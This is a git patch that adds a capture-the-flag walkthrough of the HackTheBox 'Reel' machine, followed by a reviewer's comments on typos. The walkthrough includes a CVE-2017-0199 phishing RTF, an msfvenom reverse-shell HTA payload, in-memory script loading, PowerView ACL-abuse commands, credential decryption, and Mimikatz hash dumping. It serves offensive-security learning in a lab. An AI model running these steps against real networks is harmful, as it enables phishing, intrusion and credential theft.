From eb3d84102aebe1862a10028de120c0b688187c34 Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Sun, 9 Jan 2022 05:02:24 +0500 Subject: [PATCH] Create Reel.md --- HackTheBox/Reel.md | 248 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 248 insertions(+) create mode 100644 HackTheBox/Reel.md diff --git a/HackTheBox/Reel.md b/HackTheBox/Reel.md new file mode 100644 index 0000000..c2dcea4 --- /dev/null +++ b/HackTheBox/Reel.md 
@@ -0,0 +1,248 @@ +# HackTheBox-Reel + +## NMAP + +```bash + +PORT STATE SERVICE VERSION +21/tcp open ftp Microsoft ftpd +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_05-28-18 11:19PM documents +| ftp-syst: +|_ SYST: Windows_NT +22/tcp open ssh OpenSSH 7.6 (protocol 2.0) +| ssh-hostkey: +| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA) +| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA) +|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519) +25/tcp open smtp? +| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS +SessionReq, X11Probe: +| 220 Mail Service ready +| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: +| 220 Mail Service ready +| sequence of commands +| sequence of commands +| Hello: +| 220 Mail Service ready +| EHLO Invalid domain address. +| Help: +| 220 Mail Service ready +| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\ +| SIPOptions: +| 220 Mail Service ready +| sequence of commands +| sequence of commands +| sequence of commands +| sequence of commands +| sequence of commands +| sequence of commands +``` + +## PORT 21 (FTP) + +FTP has anonymous login enabled so we can easily login + + + +We see a folder named `documents` + + + +And in the folder we can see three files + + + + + +Opening the `Applocker.docx` file it tell about making rules for some scripts + + + +Opening `Windows Event Forwarding.docx` will warn us having a macro in it and will fail to recover document + + + +Lastly the text file has this conent in it + +``` +Please email me any rtf format procedures - I'll review and convert. +new format / converted documents will be saved here. +``` + +So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? 
We don't have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running `exiftool` on word documents we get a username + + + + +## PORT 25 (SMTP) + +To check if it's a correct email addres we can use `VRFY` to check but that command is not allowed in this smtp server + + + +Instead we can use `RCPT` to check if the email address is valid + + + +And `nico@megabank.com` is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE `CVE-2017-0199` + + +http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html + + +## Foothold + +Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to genrate a hta file using `msfvenom` + +```bash +sfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh +> abc.hta +``` + +```bash +python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1 +0.14.17/abc.hta +``` + + + +Now to send the mail with the attachment , I was having difficulty to figure out to send it , on goolge every mentioned doing it through telnet by specifiying content-type and other headers but I found a neat tool called `sawks` + +http://www.jetmore.org/john/code/swaks/ + +So running this to send an email to `nico` and starting the python server to hosts the hta file + + + + + + +```bash +swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf +``` + + + +In `nico`'s directory in `Desktop` folder we can see a `cred.xml` file, reading that file it seems that there's an encrpyted password for `Tom` + + + +## Privilege Escalation (Tom) + +Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse 
shell would just hang + + + +So we can just pass arguemnts to powershell and decrypt the password for user `Tom` + +```powershell +powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password" +``` + + + +Now that we have credentials for tom user we can use ssh to login + + + +Checking which groups this user is in + + + +In the Desktop directory we see a folder `AD Audit` which already has bloodhound folder in it + + + + + +And from the text file it seems that no path is there to domain admin + + + +We can import and run `PowerView` commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine + + + +## Privilege Escalation (Claire) + +So we can bypass this by loading the script in the memory through `IEX` which downloads the script and loads it into the memory + + + +```powershell +`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip` +``` + + + +To transfer this we can use impacket's smbserver to copy the zip file onto our machine + + + + + +After this is transferred we can use bloodhound GUI to see what we can abuse in AD + + + +We have `WriteOwner` access on claire object so we can own this object and give `All` rights on this object in order to reset password + +```powershell +Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose +``` + + + +```powershell +Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose +``` + + + + + + + +## Privilege Escalation (Administrator) + +Now through `Claire` we can see that we have `WriteDacl` on `BACKUP_ADMINS` + + + + + +We can see the absue that we can add users to this group + + + +So logging in back with tom we see that we are a member of this group now + + + +But it gets reverted quickly so we need to be quick in navigating to `Administrators` folder and there we will find some backup scripts out which `BackupScript.ps1` has a password for administrator 
account + + + + + +Having the password we can login through ssh + + + +Further loading `Mimikatz` we can dump SAM hashes + + + + + +## References + +- https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum +- https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication +- https://github.com/bhdresh/CVE-2017-0199 +- https://linux.die.net/man/1/swaks +- http://www.jetmore.org/john/code/swaks/ +- https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx +- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
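Review bot: the Foothold section of the new file is internally inconsistent, which will trip up anyone following the write-up: the prose establishes `nico@megabank.com` as the valid address, but the send command is `swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf`, and the payload generator line starts with `sfvenom` while the surrounding text names the tool `msfvenom`; use one spelling of each throughout. The same section calls the mail tool `sawks` immediately above the swaks link, and the `python cve-2017-0199_toolkit.py ... -u http://10.1` line has its URL broken across two lines, so the command as shown is not copy-pasteable. In the Claire section the fenced `powershell` block wraps its only command in an extra pair of backticks (`` `Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip` ``), which renders as literal backticks inside the code block; drop the inner ones. The long runs of empty lines between paragraphs look like image embeds that were lost (the text repeatedly says "we see" or "we can see" with nothing following), so either restore the image links or replace each gap with a sentence stating what the screenshot showed, such as the exiftool output that yielded the username. Minor spelling fixes would also help readability: conent, genrate, goolge, arguemnts, decrpyt, encrpyted, absue, addres, specifiying.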